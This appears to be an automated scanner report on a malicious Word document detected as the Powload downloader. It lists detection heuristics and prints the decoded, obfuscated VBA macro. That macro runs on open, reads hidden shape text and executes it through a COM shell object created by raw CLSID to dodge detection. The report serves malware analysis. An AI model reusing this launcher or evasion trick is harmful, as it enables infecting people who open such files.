MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Powload-6770633-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6770633-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904)) Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904)) Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10639 bytes |
SHA-256: f4a137dd333a87ad5646cf6c395099b84b2a116c5ccf0ffbfaa4fcd3e3e0c187 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
186 of 273 identifiers look randomly generated (e.g. 'BJcpJnozUIw') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ukAOzli"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case QqGtA
Case 207479976
VlrZSE = 299451022
OtHVAF = dWLLzb
IjjMawl = 106745835
Case 107898840
vDuOdH = ChrW(93024130)
mhFDV = CDate(195219158)
wANkip = 211030311
End Select
tcLtGdwjw = 192601230 + CByte(awKBzOwJM - Sqr(WEKCCdwYj)) * YPLBlSOI - qBGabDN * zNVljTzW / CDate(158035072) * 2226809 * 281762672 / (25683830 - Sin(340286475))
On Error Resume Next
Select Case ArwIvkR
Case 338631635
wDfzkiM = 72369984
wjszESpc = irCvDz
HtBJibF = 190152885
Case 189045435
IHjii = ChrW(199161488)
wBQiDnfT = CDate(127773702)
mHZAAfZ = 191142474
End Select
LBAWiPUz = 62614654 + CByte(wjzNTzBj - Sqr(EFVqOESVC)) * IcGBt - hvfmSi * WmWnnuGAw / CDate(318811003) * 230042775 * 162051587 / (209649273 - Sin(276687884))
Set SvVKl = Shapes("BJcpJnozUIw")
On Error Resume Next
Select Case FiGJQh
Case 288977756
jRQjclJ = 148076343
lddloddSM = NwikEEW
tilquXtzk = 266433336
Case 27956869
iXwlEVhhQ = ChrW(6498867)
rDLiiwj = CDate(75445542)
FvQsGuj = 34385337
End Select
qtoNSopzw = 213291609 + CByte(WpYsAumj - Sqr(PzDdcpmHG)) * JmcoZHo - lXojBAb * PXYrM / CDate(54341683) * 341753871 * 78460309 / (192504251 - Sin(287886649))
On Error Resume Next
Select Case zHzcO
Case 170116777
COckLjw = 183115602
cGMOOdqzz = EZUBfoQnw
fidCzhSr = 79001614
Case 237505932
IitolD = ChrW(298629480)
TRAfPVDh = CDate(84578013)
wusBvUwcJ = 96865586
End Select
KwnNivva = 86018884 + CByte(lXzcOfwOh - Sqr(zFuPpYHiZ)) * ItiHITMSh - IHzCKXt * jpzOcSh / CDate(32776549) * 24001710 * 154392063 / (155105048 - Sin(64053165))
On Error Resume Next
Select Case KOYnfwG
Case 266083784
uumKN = 24655143
wbzVLdpQ = jXtpzs
aXNKrv = 237847499
Case 142496010
zJQnfSiEi = ChrW(52666106)
jHShZH = CDate(138690383)
YNwJCjMmA = 296866895
End Select
CribNUYcm = 106963144 + CByte(oGpfdSFfl - Sqr(aowjzzOH)) * fiLnFW - jENBi * fjYrTXCt / CDate(222129276) * 136328655 * 52533149 / (78930502 - Sin(183651928))
knNwZmwi = "" + IYmASkF + OUJVTkOd + QHHfr + wJDbdS + SvVKl.TextFrame.TextRange.Text + jOiHhB + qsrIPvR + jvQmH
On Error Resume Next
Select Case QqlTE
Case 13691448
fLDsK = 240126674
sWBKKXKR = HULdk
IUQrsaJiC = 86387499
Case 132090265
pYIiZT = ChrW(132381350)
PHFllzzhd = CDate(336713111)
YYnDicSrG = 233569995
End Select
zzqIUszY = 307663023 + CByte(JldBOfFvb - Sqr(FDUvqCV)) * GGcNObH - uccGi * EBPmK / CDate(9445290) * 130222222 * 322766912 / (85313016 - Sin(316452082))
On Error Resume Next
Select Case XbfKG
Case 229550800
aXsoqa = 138761056
uYNTsBbXT = GClqE
GwLtjA = 66764012
Case 261452801
qXLKkBvo = ChrW(109808961)
HODlFvE = CDate(75649913)
zffkT = 164590768
End Select
uPbQuNZf = 16229267 + CByte(PMiCLOV - Sqr(wFCKFz)) * oDoIKns - CHfNAjtp * jbjrcDn / CDate(114995652) * 71103498 * 132878537 / (148692652 - Sin(131476834))
On Error Resume Next
Select Case MjdKPh
Case 324258949
POaDS = 59726801
jMQHiZkSI = jOihLoiM
wJCYrLOWj = 315380887
Case 232992266
rdVBHwB = ChrW(165059207)
bQUXjTOb = CDate(26793207)
rrZMkjo = 166230317
End Select
UDBXZHrlN = 210955916 + CByte(phnEV - Sqr(iAKszvfVr)) * RQkVTZEE - atvQoiBv * kKEUq / CDate(287462199) * 330932111 * 262098934 / (95403459 - Sin(26986904))
Set KHwDwckDO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case PBiPMJW
Case 273881768
wOsbtiYdX = 241284956
hSpjzJsMv = zGANoYZ
lnsJq = 148203443
Case 187634844
Zzaoj = ChrW(178687480)
zrzLBRD = CDate(111538328)
uWwHs = 87770190
End Select
FwZmz = 1811300 + CByte(cSEnjul - Sqr(rYcAV)) * MXlhWiPUZ - RMtUpK * jzUUszdT / CDate(146672095) * 158697408 * 266175597 / (206497103 - Sin(159619851))
On Error Resume Next
Select Case GTzzHQudM
Case 313537263
XGoDipYt = 217449229
kFDKRFc = brBVDum
poiiwdf = 108967385
Case 106092274
PGOzKiYP = ChrW(143443694)
vnpKSH = CDate(240142883)
hCDuQ = 86339930
End Select
kPwcHZnuf = 278259890 + CByte(IihXwnY - Sqr(ZCwTQrt)) * jNiUpBz - PZnOoIt * UvwGW / CDate(63763719) * 37667098 * 104100602 / (148367102 - Sin(293987940))
On Error Resume Next
Select Case HYwniqp
Case 273393421
BfraHhT = 289582338
wDToBKArT = JULARiDC
NGjfrCMqr = 199418622
Case 172197406
tHULsBS = ChrW(147140370)
nrXAfEqf = CDate(169150993)
EicinMYcm = 272326300
End Select
JMtKPM = 281274782 + CByte(ZdkjDaOM - Sqr(LzVLSiV)) * RdjzU - jjSdiip * sApAST / CDate(329469683) * 166520167 * 28896879 / (164722352 - Sin(1103234))
On Error Resume Next
Select Case fRJqz
Case 317260428
PwoHoR = 29145921
iwoZOV = GKCrd
LmbJjbIiw = 206475133
Case 140998007
CmDDQSh = ChrW(150352547)
JOUNlkYK = CDate(330711729)
ISQDMNwF = 276440469
End Select
pmTSEMjDC = 303491783 + CByte(KGICXGww - Sqr(kTwsMClir)) * SNrbwXvBJ - AVIEDwM * BoGCG / CDate(334052246) * 73689809 * 141895035 / (264502370 - Sin(178337277))
On Error Resume Next
Select Case HpPAmdu
Case 237100931
FEbzrpHa = 268183957
waPQQ = MwdALbSGO
QcMJlTo = 320990399
Case 63199282
FYJGkk = ChrW(97671471)
zvsYwBZj = CDate(108427481)
bdlUiWZi = 89482616
End Select
WclSHAtn = 259537524 + CByte(QaMiJTc - Sqr(iLjECFUfi)) * pnhGXjNU - ZRzHl * tTAQDLPth / CDate(1049347) * 16408803 * 314279488 / (121056263 - Sin(171274524))
Const jwpVzajEwiI = 0
On Error Resume Next
Select Case GKuFH
Case 149585934
wCmYGTjMv = 18810428
DpzRsf = zlbNvOT
ndPCUJnPb = 313275651
Case 105972853
bTrnc = ChrW(248453575)
ZpKoRPaJ = CDate(248136385)
iHXFJj = 21510892
End Select
siLQaXWcb = 20744940 + CByte(tnlJftH - Sqr(pwntzBw)) * nszRmoqjD - JOnRonX * rizwsLC / CDate(21162044) * 92264774 * 333237460 / (35697190 - Sin(267348103))
On Error Resume Next
Select Case jwfrI
Case 168108317
JDrPPz = 176677001
nQbKlvraH = DiAHwFfV
RZdJhjIO = 56432167
Case 254051211
fOmdqFlmS = ChrW(75215942)
YYEFuKCH = CDate(247762787)
tIJXKGtd = 192019402
End Select
inPHosWR = 282913251 + CByte(tDdcBE - Sqr(cmzLB)) * JmGcG - wrIpiFkJ * QColQRpqi / CDate(213955476) * 148378738 * 39480446 / (11448632 - Sin(115557953))
On Error Resume Next
Select Case wJumr
Case 79490895
UJcLPaOjw = 48060064
fZrFP = IjIdKp
AZkUToiE = 312159033
Case 13175631
ATQQEST = ChrW(170094731)
skHQq = CDate(301975105)
iIDTJTt = 77017648
End Select
quMHZFjXM = 34553900 + CByte(BripKkkqQ - Sqr(TdZMEv)) * iUjaEaNXG - jnAjEl * amdOIYjCv / CDate(165209733) * 155917143 * 115002528 / (257744718 - Sin(309065409))
KHwDwckDO.Run@ knNwZmwi, jwpVzajEwiI
On Error Resume Next
Select Case TEYbtTKp
Case 56244423
skEjlXnf = 320215791
UXDiaS = QPobMqnqL
KwEwfB = 236371283
Case 245646509
RacASIVrV = ChrW(321195658)
pAbWt = CDate(175714192)
EftRpZ = 60580020
End Select
jsWoVTz = 179606579 + CByte(WoOWS - Sqr(wStKYKXiD)) * hfFFz - DrpcdUjb * sZazFMzm / CDate(263825522) * 308428506 * 332966488 / (316605852 - Sin(96201009))
On Error Resume Next
Select Case EXLJoUOEv
Case 119584602
iREvJ = 196998000
jbINaSJi = nvqGj
OFdkCAjA = 244618140
Case 152930369
cHsXq = ChrW(330019154)
hvojrwt = CDate(342044482)
PbJFL = 129447707
End Select
DzSYbkzbX = 275420634 + CByte(qCqhwzR - Sqr(oufOjrC)) * UYbSoILoY - ZzzwNLB * DzPhiMn / CDate(254913395) * 206584977 * 8754585 / (160014467 - Sin(246573680))
On Error Resume Next
Select Case ZQMikFiKb
Case 148419186
CvaKzzvQK = 146293795
codlfhYVb = Tzruo
DBoJri = 42754228
Case 249235358
atZQZZFZi = ChrW(265558227)
AzaAlGu = CDate(259320132)
wiQLmrPW = 86496785
End Select
ziroE = 262025541 + CByte(ECiOXNFQJ - Sqr(anXkk)) * CzscNi - JjMZqpJL * NlBrJUa / CDate(135159969) * 70347871 * 304511946 / (186731742 - Sin(261176749))
On Error Resume Next
Select Case uiJEkVF
Case 45323015
osSZbz = 206892295
hmAfWzXl = VUrIq
AZwmqSW = 49778636
Case 138913993
GTJhBu = ChrW(274742262)
bzJSwY = CDate(247386274)
SbzkOHwV = 115740286
End Select
dMpVLifRP = 194654855 + CByte(DHbfhj - Sqr(NidZAEzuI)) * wwVnQCRd - GoimiII * PTYFhbG / CDate(53891224) * 231923011 * 142238564 / (22203487 - Sin(76883465))
On Error Resume Next
Select Case FMitkrVIf
Case 33761359
qvpIjoF = 273187723
hXjzwOKG = jDYwVpX
pSSQiGc = 159610001
Case 11817999
lAjCjQjJh = ChrW(190621806)
zWjOlwBz = CDate(308245926)
AlGwmWS = 19229902
End Select
HbuYZF = 277391457 + CByte(UIMMHuss - Sqr(mCtKaYGQl)) * aEwtQG - VGCzGI * PhrhNsqNF / CDate(278404705) * 237001508 * 108111729 / (63286372 - Sin(35981281))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.